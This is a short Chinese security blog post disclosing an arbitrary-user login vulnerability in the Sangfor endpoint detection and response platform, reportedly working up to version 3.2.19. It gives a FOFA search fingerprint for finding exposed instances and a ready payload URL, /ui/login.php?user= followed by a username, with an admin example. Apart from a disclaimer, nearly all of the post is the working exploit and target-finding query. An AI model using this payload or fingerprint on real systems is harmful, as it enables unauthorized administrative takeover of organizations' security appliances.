前两天爆出来的命令执行,今天在给大家爆一个任意用户登录;
看源码看到的,我测试的时候可以打到3.2.19版本,后面的版本我就不知道了;
fofa指纹:title=”SANGFOR终端检测响应平台”
漏洞利用:
只要用户存在就可以登陆
payload:
1 |
https://ip/ui/login.php?user=需登录的用户名 |
列如:
1 |
https://1.1.1.1:1980/ui/login.php?user=admin |
FROM :ol4three.com | Author:ol4three
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论